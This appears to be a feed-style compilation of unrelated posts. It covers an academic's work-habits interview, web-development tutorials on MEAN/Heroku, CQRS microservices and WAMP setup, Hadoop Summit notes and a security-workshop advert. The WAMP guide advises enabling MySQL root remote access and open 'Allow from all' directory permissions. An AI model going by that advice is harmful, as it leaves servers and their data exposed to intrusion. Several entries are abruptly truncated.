I have a Kindle that I love. I moved around a lot as a kid, and the worst thing about moving was always that I had to throw out books. The Kindle means I can take my books with me without them taking up all my luggage space. I still prefer physical copies, but the Kindle comes a close second, especially as mine lets me annotate my books, making it useful for academic reading as well.

          Which skill makes you stand out as an academic?
I tend to say yes, and I am good with deadlines. I have been told these are not necessarily common traits amongst academics. I have a lot on my plate, but I actually like it that way; it makes me feel like I am accomplishing things and contributing to a wider community of research, teaching and outreach. Sometimes this can be stressful, and I often get advised to only do projects that are directly related to my research or to some kind of monetary/position gain. However, I think that all these projects enrich my research: they give me skills and contacts I would not have otherwise, and they give me more tangible outcomes than my long-term thesis research, which helps motivate me to continue. They have also taught me the value of doing things to a strict deadline. If you are juggling a lot of projects, it is important to get the high-priority ones out of the way fast, so you don't end up eating into the time you are meant to spend on other things.

          What do you listen to when you work?
          It really depends on my mood and on what I am working on. While I am reading I tend to not listen to anything. While writing it can be anything from instrumental movie soundtracks, to rap or even country music. Lately I have been listening to a lot of Broadway musical soundtracks. Often I just need something to get me going and then to keep me motivated. I tend to get bored easily, so music actually makes me more likely to keep at it when I am not feeling particularly inspired.

          What are you currently reading? How do you find time for reading?

I just finished an amazing book by Joseph Assaf called ‘In Someone Else’s Shoes’. It tells the story of a Lebanese Australian man who built a successful career around advocating for the significance of cross-cultural empathy in the business world. It is a fantastic read.

          The next book on my list is Ken Robinson’s ‘Creative Schools’. It has been described to me as a manifesto for engaged educational programs.

          I find it very difficult to find time to read during a regular work week. It is not that I don’t have any spare time, but I tend to want to fill it with other things, after a full day of sitting in my office reading and typing. When I do make time for reading I often end up feeling guilty about reading non-thesis related things.

          Are you more of an introvert or extrovert? How does this influence your working habits?
I am definitely more of an extrovert. I get very frustrated when alone with my own thoughts. I have less of an issue with having leisure time on my own (I can watch a movie, read, go for a run), but when I am doing work, I find being alone difficult. Research is already such an isolating experience, particularly at PhD level. In order to avoid daily meltdowns, I try to work with others and allocate time to discussing my work in a group. The danger with this is that these discussion sessions can sometimes go on far longer than expected, but I'd prefer to lose a day of work to exchanging ideas with colleagues than to lose one to burnout.

          What's your sleep routine like?
          When I am alone at home, which happens for about 1 to 2 months a year nowadays, I tend to wake up around 10am and work until about 2 or 3am. I am definitely not a morning person and I find night times to be oddly productive, particularly for writing. Unfortunately, this schedule doesn’t really line up with normal university working hours, and my partner has a 9-5 university job, so when he is around I try to adapt to his schedule and sleep from about 11pm to 7am. It still feels slightly wrong to me, though I seem to be in the minority on this one.

          What's your work routine like?
          This varies so much depending on what projects I am working on and whether or not I am teaching. I tend to do administrative work in the morning, as I don’t feel I am at my full research capacity, and I always seem to have more than enough forms and emails to keep me busy for a few hours every day. Then around lunch (11 to about 3) is when most of my meetings, social or work related, happen, so there is a lot of flitting around across campus and the city. Once I get back to the office I then get into reading and writing, until around 5:30 when I take a short break to go for a run or walk followed by dinner. Then if I have nothing else planned for the evening I continue to do writing, reading, or if I am feeling really out of it referencing or editing until around 10. If I am working on an exhibition, or a class, I am much more focused, as there tends to be a tighter deadline involved, particularly when there is marking to do.

          What's the best advice you ever received?
          If you have something that you want to or need to do, don’t just leave it until tomorrow, tomorrow there will be new things to do, new opportunities and new hindrances.
Legal Advisor for the Management of Distressed Investments
          Your tasks will include, among other things, providing legal advice to all departments of the company; drafting documents, contracts and legal opinions; monitoring legislation and other regulations affecting the company's operations; cooperating and coordinating with attorneys and/or notaries; and monitoring relevant publications on AJPES...
                    Deploy Your Own REST API in 30 Mins Using mLab and Heroku        

          This article was first published on the Heroku Dev Center

          The MEAN stack is a popular web development stack made up of MongoDB, Express, AngularJS, and Node.js. MEAN has gained popularity because it allows developers to program in JavaScript on both the client and the server. The MEAN stack enables a perfect harmony of JavaScript Object Notation (JSON) development: MongoDB stores data in a JSON-like format, Express and Node.js facilitate easy JSON query creation, and AngularJS allows the client to seamlessly send and receive JSON documents.


          MEAN is generally used to create browser-based web applications because AngularJS (client-side) and Express (server-side) are both frameworks for web apps. Another compelling use case for MEAN is the development of RESTful API servers. Creating RESTful API servers has become an increasingly important and common development task, as applications increasingly need to gracefully support a variety of end-user devices, such as mobile phones and tablets. This tutorial will demonstrate how to use the MEAN stack to rapidly create a RESTful API server.

          AngularJS, a client-side framework, is not a necessary component for creating an API server. You could also write an Android or iOS application that runs on top of the REST API. We include AngularJS in this tutorial to demonstrate how it allows us to quickly create a web application that runs on top of the API server.

          The application we will develop in this tutorial is a basic contact management application that supports standard CRUD (Create, Read, Update, Delete) operations. First, we'll create a RESTful API server to act as an interface for querying and persisting data in a MongoDB database. Then, we'll leverage the API server to build an Angular-based web application that provides an interface for end users. Finally, we will deploy our app to Heroku.

          So that we can focus on illustrating the fundamental structure of a MEAN application, we will deliberately omit common functionality such as authentication, access control, and robust data validation.

          Prerequisites

          To deploy the app to Heroku, you'll need a Heroku account. If you have never deployed a Node.js application to Heroku before, we recommend going through the Getting Started with Node.js on Heroku tutorial before you begin.

          Also, ensure that you have the following installed on your local machine:

          Source Code Structure

          The source code for this project is available on GitHub at https://github.com/sitepoint-editors/mean-contactlist. The repository contains:

          • package.json — a configuration file that contains metadata about your application. When this file is present in the root directory of a project, Heroku will use the Node.js buildpack.
          • app.json — a manifest format for describing web apps. It declares environment variables, add-ons, and other information required to run an app on Heroku. It is required to create a "Deploy to Heroku" button.
          • server.js — this file contains all of our server-side code, which implements our REST API. It's written in Node.js, using the Express framework and the MongoDB Node.js driver.
          • /public directory — this directory contains all of the client-side files which includes the AngularJS code.

          See the Sample Application Running

          To see a running version of the application this tutorial will create, you can view our running example here: https://sleepy-citadel-45065.herokuapp.com/

          Now, let's follow the tutorial step by step.

          Create a New App

          Create a new directory for your app and use the cd command to navigate to that directory. From this directory, we'll create an app on Heroku which prepares Heroku to receive your source code. We'll use the Heroku CLI to get started.

          $ git init
          Initialized empty Git repository in /path/.git/
          $ heroku create
          Creating app... done, stack is cedar-14
          https://sleepy-citadel-45065.herokuapp.com/ | https://git.heroku.com/sleepy-citadel-45065.git
          

          When you create an app, a git remote (called heroku) is also created and associated with your local git repository. Heroku also generates a random name (in this case sleepy-citadel-45065) for your app.

          Heroku recognizes an app as Node.js by the existence of a package.json file in the root directory. Create a file called package.json and copy the following into it:

          {
            "name": "MEAN",
            "version": "1.0.0",
            "description": "A MEAN app that allows users to manage contact lists",
            "main": "server.js",
            "scripts": {
              "test": "echo \"Error: no test specified\" && exit 1",
              "start": "node server.js"
            },
            "dependencies": {
              "body-parser": "^1.13.3",
              "express": "^4.13.3",
              "mongodb": "^2.1.6"
            }
          }
          

          The package.json file determines the version of Node.js that will be used to run your application on Heroku, as well as the dependencies that should be installed with your application. When an app is deployed, Heroku reads this file and installs the appropriate Node.js version together with the dependencies using the npm install command.

          To prepare your system for running the app locally, run this command in your local directory to install the dependencies:

          $ npm install
          

          After dependencies are installed, you will be ready to run your app locally.

          Provision a MongoDB Database

          After you set up your application and file directory, create a MongoDB instance to persist your application's data. We'll use the mLab hosted database, a fully managed MongoDB service, to easily provision a new MongoDB database:

When you create an mLab database, you will be given a MongoDB connection string. This string contains the credentials to access your database, so it's best practice to store the value in a config variable. Let's go ahead and store the connection string in a config var called MONGOLAB_URI:

          heroku config:set MONGOLAB_URI=mongodb://your-user:your-pass@host:port/db-name
          

          You can access this variable in Node.js as process.env.MONGOLAB_URI, which we will do later.

          Now that our database is ready, we can start coding.

          Connect MongoDB and the App Server Using the Node.js Driver

          There are two popular MongoDB drivers that Node.js developers use: the official Node.js driver and an object document mapper called Mongoose that wraps the Node.js driver (similar to a SQL ORM). Both have their advantages, but for this example we will use the official Node.js driver.
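To make the connection concrete, here is a minimal sketch of how a server.js along these lines might open the database using the MONGOLAB_URI config var from earlier and expose one read-only route. This is an illustration only, not the tutorial's actual server.js: the "contacts" collection name, the /contacts route, and the local fallback URI are assumptions.

// Minimal sketch (assumed names): Express app backed by the official MongoDB Node.js driver (2.x).
var express = require('express');
var bodyParser = require('body-parser');
var mongodb = require('mongodb');

var app = express();
app.use(bodyParser.json());

var db; // set once the connection is established

mongodb.MongoClient.connect(process.env.MONGOLAB_URI || 'mongodb://localhost:27017/test', function (err, database) {
  if (err) {
    console.log(err);
    process.exit(1);
  }
  db = database;

  // Start listening only after the database connection is ready.
  var server = app.listen(process.env.PORT || 8080, function () {
    console.log('App now running on port', server.address().port);
  });
});

// Example endpoint: return all documents from a hypothetical "contacts" collection as JSON.
app.get('/contacts', function (req, res) {
  db.collection('contacts').find({}).toArray(function (err, docs) {
    if (err) {
      res.status(500).json({ error: err.message });
    } else {
      res.status(200).json(docs);
    }
  });
});

The same pattern extends naturally to the POST, PUT and DELETE handlers that a CRUD contact list needs.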

Continue reading: Deploy Your Own REST API in 30 Mins Using mLab and Heroku.


My GitHub page
          Right now I only have one project up. It is an MVC framework written in PHP. Instead of supporting a classic SQL database, I have chosen to use the NoSQL database MongoDB. The reason it ended up being MongoDB is that it is fast and flexible. https://github.com/Sprattel/
Building Microservices with Spring Boot, Axon CQRS/ES, and Docker
          This is an Event Sourcing sample project built with Spring Boot, Axon, and Docker. Its technical highlights:
          1. Microservices implemented in Java with Spring Boot;
          2. Command Query Responsibility Segregation (CQRS) and Event Sourcing (ES) using Axon Framework v2, MongoDB and RabbitMQ;
          3. Built, delivered and run with Docker;
          4. Centralized configuration and service registration with Spring Cloud;
          5. API documentation provided by Swagger and SpringFox.

Project source code: GitHub

How it works:
The application is built using the CQRS architectural pattern. In CQRS, commands such as ADD are separated from queries such as VIEW (where id=1). In this example, the domain code has been split into two components: a command-side microservice and a query-side microservice.

A microservice has a single responsibility and its own data store, and each one can be scaled and deployed independently of the others.

Both the command-side and the query-side microservices are developed with the Spring Boot framework. Communication between the command and query microservices is event-driven: events are passed between the microservice components as RabbitMQ messages. Messaging provides a scalable event carrier between process nodes or microservices; loosely coupled communication with legacy or other systems can also go through messages.

Note that services must not share a database with each other. This is important because microservices should be highly autonomous, which in turn helps them scale independently of one another.

In CQRS, a command is "an action that changes state". The command-side microservice contains all the domain logic and business rules. Commands are used to add new products or to change their state; executing these commands against a specific product produces events, which are persisted to MongoDB via the Axon framework and then propagated to other processes or microservices via RabbitMQ.

In event sourcing, events are the primary record of state changes. The system uses them to re-establish an entity's current state (by replaying past events up to the present, the current state can be rebuilt). This may sound slow, but in practice the events are simple and replay very quickly, and a "snapshot" strategy can be used as an optimization.

Note that in DDD, the entity here refers to an aggregate root.
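As a minimal, framework-independent illustration of the replay idea (plain JavaScript rather than Axon; the event types and fields are hypothetical), rebuilding an aggregate's current state is essentially a fold over its stored events:

// Rebuild a product's current state by replaying its events in order.
// Event types here (ProductAdded, ProductSold) are illustrative, not Axon's API.
function replay(events) {
  return events.reduce(function (state, event) {
    switch (event.type) {
      case 'ProductAdded': return { id: event.id, name: event.name, sold: false };
      case 'ProductSold':  return Object.assign({}, state, { sold: true });
      default:             return state;
    }
  }, null);
}

// A snapshot is simply the state after the first N events, so later replays
// can start from the snapshot instead of from the very beginning.

This is the sense in which replay is cheap: each event handler is a small, pure state transition.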

That covers the command-side microservice; now let's look at the query side:
The query microservice generally plays the role of an event listener and view. It listens for the events emitted by the command side and then processes them to meet the query side's requirements.

In this example, the query side simply builds and maintains a "materialised view" or "projection" that holds the latest state of the products, i.e. the product id and description and whether it has been sold. The query side can be replicated many times for scalability, and messages can be kept in RabbitMQ queues for durability; this temporary retention of messages protects against the query-side microservice going down.

Both the command and the query microservices expose REST APIs that provide access for external clients.

Now let's see how to run this example with Docker. You will need Ubuntu 16.04 with:
1. Docker (v1.8.2)
2. Docker Compose (v1.7.1)

In an empty directory, run the following command to download the docker-compose file:

          $ wget https://raw.githubusercontent.com/benwilcock/microservice-sampler/master/docker-compose.yml
Note: do not change the file name.

Starting the microservices takes just one simple command:

          $ docker-compose up

You will see a lot of download information and log output on the screen as the Docker images are downloaded and run. There are six containers in total: 'mongodb', 'rabbitmq', 'config', 'discovery', 'product-cmd-side', and 'product-qry-side'.

Use the following command to test adding a new product:

          $ curl -X POST -v --header "Content-Type: application/json" --header "Accept: */*" "http://localhost:9000/products/add/1?name=Everything%20Is%20Awesome"

Query the new product:

          $ curl http://localhost:9001/products/1

          Microservices With Spring Boot, Axon CQRS/ES, and Docker



Illustrated guide: setting up a WAMP environment on Windows (recommended)

This article walks through the steps I took to install a WAMP environment myself, along with some notes. Warning: lots of screenshots ahead!

PHP runtime environments:

Three ways to install on Linux: from source packages, from RPM packages, or as an integrated stack (LNMP).

Two ways to install on Windows: installing each component separately, or as an integrated stack (AppServ, phpStudy, WAMP).

Installing a PHP development environment on Windows, with each required piece of software installed separately:

Preparation before installing

Install Apache

Install MySQL

Install PHP

Install phpMyAdmin




Software and download addresses:

• Apache: http://httpd.apache.org/download.cgi
• PHP: http://www.php.net/downloads.php
• MySQL: http://dev.mysql.com/downloads/mysql/ (the no-install ZIP version is used here)
• phpMyAdmin: http://www.phpmyadmin.net
Installing Apache:

Double-click httpd-2.2.21-win32-x86-no_ssl.msi to start the installation. The welcome screen appears.

Click "Next" to continue; the license agreement appears.

Select "I accept the terms in the license agreement" to accept it, then click "Next" to continue; the installation notes appear.

Click "Next" again; the server information screen appears.

"Network Domain": enter your network domain, for example admin10000.com. If you do not have one, you can enter anything.

"Server Name": enter your server name (the host name), for example www.admin10000.com. If you do not have one, anything will do.

"Administrator's Email Address": enter the system administrator's contact email address, for example webmaster@admin10000.com. This address is shown to visitors when the system fails.

Tip: since we are installing Apache mainly for development on the local machine, entering localhost for the first two fields is fine. All three values can be filled in freely and changed later in httpd.conf.

Below that there are two options: the first installs for all users of the system, uses the default port 80, and starts automatically as a system service; the other installs only for the current user, uses port 8080, and is started manually. We choose the first, "for All Users, on Port 80, as a Service - Recommended", then click "Next" to continue.

The installation type screen appears: Typical is the standard installation, Custom is user-defined. We choose Typical here and click "Next" to continue.

Click "Change..." to specify the installation directory manually. Here we install Apache to "D:\Apache\"; where you install it is up to you. It is recommended not to install on the drive that holds the operating system (usually C:), so that restoring the OS after a failure does not also wipe your Apache configuration files. After choosing the directory, click "Next" to continue.

Confirm that the installation options are correct and click "Install" to begin. If you want to check again, click "Back" to step back through the screens.

The installation progress is shown; wait a moment and the completion screen appears.

After clicking "Finish", an icon with a green indicator appears in the system tray in the lower right corner.

This indicates that Apache has started correctly.

Now entering http://localhost/ or http://127.0.0.1/ in a browser shows the Apache welcome page.

Installing MySQL:

Open the downloaded MySQL installer mysql-5.0.27-win32.zip, double-click to extract it, and run "setup.exe"; the welcome screen appears.

Click "Next" to continue; the license agreement appears.

Select "I accept the terms in the license agreement", then click "Next" to continue. In the installation type window there are three options: "Typical" (the default), "Complete" and "Custom". We choose "Custom", because customizing lets us get more familiar with the installation process, which is helpful for learning MySQL. Click "Next" to continue.

On the custom installation screen, choose the installation path for MySQL; here I set it to "d:\Program File\MySQL". Click "Next" to continue.

Next comes the ready-to-install screen. First confirm the earlier settings; if something is wrong, click "Back" to go back, otherwise click "Install" to continue.

After clicking "Install", the installation progress screen appears. After a short while the MySQL installation completes and the finish screen appears.

On this screen just click "Next".

Be sure to tick the "Launch the MySQL Instance Configuration Wizard" option. This starts the MySQL configuration, which is the most important part (it can also be done later). Click "Finish" to enter the configuration wizard.

Installing MySQL itself is very simple; the key part is the configuration that follows. After clicking finish, the configuration wizard appears; click "Next" to start configuring.

In the configuration type window, choose between "Detailed Configuration" and "Standard Configuration". To get familiar with the process we choose "Detailed Configuration" and click "Next" to continue.

In the next window, choose the server type: "Developer Machine", "Server Machine" or "Dedicated MySQL Server Machine". Since we only use it for learning and testing, the default is fine; click "Next" to continue.

On the next screen, choose the database usage: "Multifunctional Database", "Transactional Database Only" or "Non-Transactional Database Only". Here I choose the first, general-purpose option and click "Next" to continue.

On the next screen, configure the InnoDB Tablespace, i.e. choose a storage location for the InnoDB data files. If you change it, remember the location and choose the same place when reinstalling, otherwise the database may be damaged; of course, having a backup of the database avoids that problem.

On the next page, choose the expected load, i.e. the number of concurrent connections: "Decision Support (DSS)/OLAP" (about 20), "Online Transaction Processing (OLTP)" (about 500), or "Manual Setting" (set manually; here 15). We choose manual setting and click "Next" to continue.

By default MySQL enables TCP/IP networking on port 3306. If you do not want to use this port you can change it via the drop-down list, but make sure the port is not already in use. The "Add firewall exception for this port" checkbox registers the port with the firewall; I selected it here. The "Enable Strict Mode" checkbox enables MySQL's strict mode, in which MySQL checks input data strictly and does not tolerate small syntax errors; for beginners this is not recommended, to avoid trouble. I ticked it here, but you can leave it unchecked. Click "Next" to continue.

On the character encoding page, set the character set MySQL will use. The first option is a Western (Latin) encoding, the second is the multi-byte universal UTF-8 encoding, and the third is manual. We choose UTF-8. If you do not choose UTF-8 here, you will get garbled characters when connecting to the database via JDBC and will need to add "useUnicode=true&characterEncoding=UTF-8" to the connection string to fix it, so for convenience set UTF-8 now. One caveat: when inserting Chinese characters from the console you will get errors, and queries on tables containing Chinese characters will not display them; the workaround is to set the system parameter "set names gbk" each time you enter MySQL. Click "Next" to continue.

On the next page choose whether to install MySQL as a Windows service, optionally specify the Service Name, and choose whether to add MySQL's bin directory to the Windows PATH (once added, you can use the programs in bin without specifying the directory; for example, to connect you can simply type "mysql -u username -p password"). Click "Next" to continue.

On the next page decide whether to change the password of the default root user (the superuser; the password is empty by default). If you want to change it, enter the new password under "New root password". Enable root remote access and do not create an anonymous user. Click "Next" to continue.

At this point all the configuration choices have been made; click the "Execute" button to apply the configuration.

After a few minutes, a screen appears indicating that the MySQL configuration has finished successfully.

Start the MySQL service from the Services panel, then in a command window enter "mysql -h localhost -u root -p" (or "mysql -h localhost -uroot -pPASSWORD"), and enter the user's password at the prompt.

Installing PHP:

A. Install Apache

B. Install PHP (just extract the archive to the desired location)

C. Configure PHP

Rename php.ini-dist to php.ini, then modify line 486 and set:

          extension_dir = "D:/php-5.2.6/ext"

D. Edit the Apache configuration file httpd.conf

# Load the PHP module

          LoadModule php5_module "D:/php-5.2.6/php5apache2_2.dll"

# Location of the PHP configuration file

          PHPIniDir "D:/php-5.2.6"

# Which file types are handed to the PHP engine

          AddType application/x-httpd-php .php

E. Restart Apache

Then edit the httpd.conf configuration file:

a) Modify line 177 to set the document root

          DocumentRoot "D:/ftp/Public/www"

b) Modify line 244 so that the site directory matches the document root

          <Directory "D:/ftp/Public/www">

c) Modify line 187 to set access permissions for the site root directory

          <Directory />

          Options FollowSymLinks

          AllowOverride None

          Order allow,deny

          Allow from all

          </Directory>

d) Modify line 240 to set the site's default document (if the specified HTML document does not exist, all files in the site root directory are listed)

          DirectoryIndex abc.html

e) Restart the Apache service

PHP configuration

          LoadModule php5_module "D:\Program Files (x86)\Apache Software Foundation\php5.2.6\php5apache2_2.dll"

          PHPIniDir "D:\Program Files (x86)\Apache Software Foundation\php5.2.6"

          AddType application/x-httpd-php .php

That completes the installation. It is fairly simple, just quite a few steps - it wore me out. If you spot any problems, please let me know.

That is the whole of this illustrated guide to setting up a WAMP environment on Windows. I hope it gives you a useful reference, and please continue to support 脚本之家.


                    Request Log - RubyGem for Logging Rack (Rails) Web Requests to MongoDB        

          Prompted by the fact that Heroku doesn't keep the Rails request logs around I went out looking for a logging solution. What I've ended up with is Request Log - a simple RubyGem for logging web requests to MongoDB.

My experiences with logging to MongoDB so far have been very positive. I see big potential in logging web requests to a database. The reason MongoDB is so well suited for the task is its high performance and strong query capabilities. This allows you to do advanced queries such as "give me all requests in this time period, with this response status, this execution time, these parameters, etc.". Each web request becomes a document in MongoDB, and if you choose your database fields wisely you have a great tool at your disposal for statistics, monitoring, debugging, etc.
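For example, a query of that kind might look like the following in the mongo shell. This is only an illustration: the collection name (requests) and the field names (time, status, runtime) are assumptions, not Request Log's documented schema.

// All requests in a one-hour window that returned HTTP 500 and took longer
// than 1000 ms, most recent first (illustrative schema).
db.requests.find({
  time:    { $gte: ISODate("2010-11-01T10:00:00Z"), $lt: ISODate("2010-11-01T11:00:00Z") },
  status:  500,
  runtime: { $gt: 1000 }
}).sort({ time: -1 })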

          I'm curious to see how we'll be able to design and use our web request logs in the project I'm currently in. I'll report back here any interesting findings that we make.


                    Rails Counter Cache Updates Leading to MySQL Deadlock        

I've gotten a few error messages lately where a plain vanilla ActiveRecord counter cache update (the update_counters_without_lock method) has led to an error being thrown from MySQL - "Mysql::Error: Deadlock found when trying to get lock; try restarting transaction: UPDATE `events` SET `attendees_count` = COALESCE(`attendees_count`, 0) + 1 WHERE (`id` = 1067)".

          It seems someone else has tried to report this as a bug but Mysql is saying that it's a feature and is referring to the lock modes documentation. There is some interesting info on deadlocks in InnoDB over at rubyisms. I haven't had time to dig into the theory though. Has anybody else had this issue? What can be done about it (other than switch to PostgreSQL)?


                    How to Install MongoDB (2.0.3) on openSUSE 12.1        

          MongoDB is an open source, document-oriented database designed with both scalability and developer agility in mind. Instead of storing your data in tables and rows as you would with a relational database, in MongoDB you store JSON-like documents with dynamic schemas. The goal of MongoDB is to bridge the gap between key-value stores (which are…

          The post How to Install MongoDB (2.0.3) on openSUSE 12.1 appeared first on IT'zGeek -.


                    LET'S HAVE A TOAST...        




          Let's have a toast for all the assholes and all the barefoot white girls that want to milk any sympathy that those assholes generated for them, until the last drop. I mean, it was an awards show stunt. These sort of things happen all the time. You didn't see puffy making subliminal references to ODB at the American Music Awards a year after Dirt McGirt stormed the stage during Diddy's acceptance speech to inform the audience that "Wu Tang is for the kids!" Yeah Ye was a jackass for doing it, but he did it and Swift still got her chance to finish her speech (thanks to Beyonce). In the words of Lord Voldemort (via twitter) "Dear Taylor Swift. He stole your microphone. It's been a year. Get over it. It's not like he broke up with you on the phone or something..."

          -Noface
                    Security Analytics - Visualization - Big Data Workshop Black Hat 2017        


          VISUAL ANALYTICS – DELIVERING ACTIONABLE SECURITY INTELLIGENCE


          BlackHat 2017 - Las Vegas


          Big Data is Getting Bigger - Visualization is Getting Easier - Learn How!
          Dates: July 22-23 & 24-25
          Location: Las Vegas, USA

          SIGN UP NOW


          OVERVIEW

          Big data and security intelligence are the two very hot topics in security. We are collecting more and more information from both the infrastructure, but increasingly also directly from our applications. This vast amount of data gets increasingly hard to understand. Terms like map reduce, hadoop, spark, elasticsearch, data science, etc. are part of many discussions. But what are those technologies and techniques? And what do they have to do with security analytics/intelligence? We will see that none of these technologies are sufficient in our quest to defend our networks and information. Data visualization is the only approach that scales to the ever changing threat landscape and infrastructure configurations. Using big data visualization techniques, you uncover hidden patterns of data, identify emerging vulnerabilities and attacks, and respond decisively with countermeasures that are far more likely to succeed than conventional methods. Something that is increasingly referred to as hunting. The attendees will learn about log analysis, big data, information visualization, data sources for IT security, and learn how to generate visual representations of IT data. The training is filled with hands-on exercises utilizing the DAVIX live CD.



          What's New?

          The workshop is being heavily updated over the next months. Check back here to see a list of new topics:

          • Security Analytics - UEBA, Scoring, Anomaly Detection
          • Hunting
          • Data Science
          • 10 Challenges with SIEM and Big Data for Security
          • Big Data - How do you navigate the ever growing landscape of Hadoop and big data technologies? Tajo, Apache Arrow, Apache Drill, Druid, PrestoDB from Facebook, Kudu, etc. We'll sort you out.


          SYLLABUS

          The syllabus is not 100% fixed yet. Stay tuned for some updates.

          Day 1:

          Log Analysis

          • Data Sources Discussion - including PCAP, Firewall, IDS, Threat Intelligence (TI) Feeds, CloudTrail, CloudWatch, etc.
          • Data Analysis and Visualization Linux (DAVIX)
          • Log Data Processing (CSVKit, ...)

          SIEM, and Big Data

          • Log Management and SIEM Overview
          • LogStash (Elastic Stack) and Moloch
          • Big Data - Hadoop, Spark, ElasticSearch, Hive, Impala

          Data Science

          • Introduction to Data Science
          • Introduction to Data Science with R
          • Hunting

          Day 2:

          Visualization

          • Information Visualization History
          • Visualization Theory
          • Data Visualization Tools and Libraries (e.g., Mondrian, Gephi, AfterGlow, Graphiti)
          • Visualization Resources

          Security Visualization Use-Cases

          • Perimeter Threat
          • Network Flow Analysis
          • Firewall Visualization
          • IDS/IPS Signature Analysis
          • Vulnerability Scans
          • Proxy Data
          • User Activity
          • Host-based Data Analysis



          Sample of Tools and Techniques

          Tools to gather data:

          • argus, nfdump, nfsen, and silk to process traffic flows
          • snort, bro, suricata as intrusion detection systems
          • p0f, npad for passive network analysis
          • iptables, pf, pix as examples of firewalls
          • OSSEC, collectd, graphite for host data

          We are also using a number of visualization tools to analyze example data in the labs:

          • graphviz, tulip, cytoscape, and gephi
          • afterglow
          • treemap
          • mondrian, ggobi

          Under the log management section, we are going to discuss:

          • rsyslog, syslog-ng, nxlog
          • logstash as part of the elastic stack, moloch
          • commercial log management and SIEM solutions

          The section on big data is covering the following:

          • hadoop (HDFS, map-reduce, HBase, Hive, Impala, Zookeper)
          • search engines like: elastic search, Solr
          • key-value stores like MongoDB, Cassandra, etc.
          • OLAP and OLTP
          • The Spark ecosystem


          SIGN UP

          TRAINER

          Raffael Marty is vice president of security analytics at Sophos, and is responsible for all strategic efforts around security analytics for the company and its products. He is based in San Francisco, Calif. Marty is one of the world's most recognized authorities on security data analytics, big data and visualization. His team at Sophos spans these domains to help build products that provide Internet security solutions to Sophos' vast global customer base.

          Previously, Marty launched pixlcloud, a visual analytics platform, and Loggly, a cloud-based log management solution. With a track record at companies including IBM Research, ArcSight, and Splunk, he is thoroughly familiar with established practices and emerging trends in the big data and security analytics space. Marty is the author of Applied Security Visualization and a frequent speaker at academic and industry events. Zen meditation has become an important part of Raffy's life, sometimes leading to insights not in data but in life.


                    DevGuild: Content Strategy – Conversion & Metrics Panel, With Twilio, Box, & MongoDB        

          Watch MongoDB CMO Meagen Eisenberg, Twilio’s Head of Content Devang Sachdev and VP of Marketing at Box Lauren Vaccarello in conversation with Reify founder Michael Bernstein as they discuss the metrics, tooling and decisions required to convert content audiences into paying customers.

          The post DevGuild: Content Strategy – Conversion & Metrics Panel, With Twilio, Box, & MongoDB appeared first on Heavybit.


                    Hadoop Summit San Jose June 13-14, 2012        
          Hadoop Summit is taking place in San Jose, California in June 13 and 14. There are different interesting and not so interesting sessions.

An observation about the organization - so many things are distributed, in the spirit of Hadoop's distributed nature. For example, the big hall for lunch and presenters' booths is at one end of the building and the sessions are at the other end, so people have to walk back and forth. Another example - lunch: boxes with sandwiches are on one side of the hall, soda is on the other...

There are no power sockets to plug in your laptop, only a couple along the walls.

Several sessions are over capacity; I couldn't get into some of them.

          But anyway here are some session notes:



          Hadoop sessions notes


          == AWS (Amazon Web Services) big data infrastructure



          • Netflix streams data from S3 directly into MapReduce (w/o HDFS) and back
          • Netflix bumps up from 300 to 400+ nodes over weekend
          • Netflix has an additional query cluster
          • Cheaper Experimentation = Faster Innovation
          • Logs are stored as JSON in S3
• Honu, a tool that aggregates logs and makes them available as Hive tables for analysts: https://github.com/jboulon/Honu


          Another climate prediction company:

          • Provision a cluster, send data, run jobs, shut down the cluster.


Case study: airbnb (find a place to stay) - they moved from RDS to DynamoDB (Amazon's NoSQL database)
and use S3 for data storage



          == Unified Big Data Architecture: Integrating Hadoop within an Enterprise Analytical Ecosystem - Aster


          Different data:

          • stable schema (structured) - data from RDB's, ... Use Teradata or Hadoop sometimes
          • evolving schema (semi-structured) - web logs, twitter stream, ... Hadoop, Aster for joining with structured data and for SQL+MapReduce
          • no schema (unstructured), PDF files, images,... Hadoop, sometimes Aster for MapReduce Analytics



          Aster SQL-H - for business people

          • ANSI SQL on Hadoop data
          • through HCatalog it connects to Hive and HDFS




          == Scalding (new Hadoop language from Twitter)


• it looked to me like a library for Scala and Cascading
          • it can read/write from/to HDFS, DBs, MemCache, etc...
          • the model is similar to Pig and coding style is similar to Cascading
          • you can develop locally without shipping to hadoop
• I was losing track, actually, when the guy was talking about Scala or Cascading or Scalding, because of my lack of knowledge of these things
• Scala is a language for writing, not reading (personal impression)



          == Microsoft Big Data



• Microsoft wants to make sure that Hadoop works well on Azure as well as Windows
• On Azure it has a neat UI for administration and data processing
          • It has Hive console to create and manage Hive tables
          • It's all on http://hadooponazure.com



• Integrating Excel with hadooponazure: you download an ODBC driver for Hive and connect your Excel to Hive data.
• Then you can build Hive data and pull it into Excel. This Excel document is uploaded to SharePoint, where you do all sorts of reporting, pivoting and charting. Once you republish the document to SharePoint, you can schedule the Excel document to refresh itself from Hadoop at a certain cadence.


          .NET also has a neat way to programmatically submit the Hive jobs.

          JavaScript can call Hadoop jobs from "Interactive JavaScript console" in hadooponazure.com. You can query hive and parse the results into json and then graph it.

          Hadoop you do? I am fine... -- funny sentence.

          Overall: Microsoft did a good job in bringing Hadoop to the less technically prepared people.

          == Hadoop and Cloud @ Netflix

          • They recommend movies based on Facebook (user's profile, friends)
          • Everything is personalized
          • 25M+ subscribers
          • 4M/day ratings
          • Searches: 3M/day
          • Plays: 30M/day
          They use
          • Hadoop
          • Hive
          • Pig
          • Java
          They use "Markov Chains" algorithm.


          Sqoop 2



          • It's moving data from/to relational and non-relational databases
          • It's much easier to use than sqoop 1
          • It has UI admin panel
          • It's now client-server as opposed to only client sqoop 1
          • It's easier to integrate with Hive and HBase. In fact you can not only move data from db's to hdfs but also further move data to hive tables or hbase tables
          • It is going to be more secure






                    Eclipse Newsletter - BIRT and Big Data        
          Find out how to use BIRT to visualize data from Hadoop, Cassandra and MongoDB in this month's issue of the Eclipse Newsletter.
                    Etnies Aventa ODB LX Mens Leather Skate Shoes - Black        
          Etnies Aventa ODB LX Mens Leather Skate Shoes - Black

Great new-style men's skate shoe from Etnies: leather uppers with a warm plush lining, STI REPEL water-repellent treatment, a tongue and heel pull for easy fit, and the STI Foam Lite 2 footbed for extra comfort.


                    NuoDB driver        
I've tested NuoDB these days. It's a promising database server, currently in beta, but there are some problems that make NuoDB feel more like a pre-alpha release. It's cool, it's cloud, it's nice, and it is something that we all want and need: SQL on the NoSQL market - the cloud.

GyroGears already generates code for NuoDB, but since it is so unstable, I don't recommend deploying Gyro applications on NuoDB.

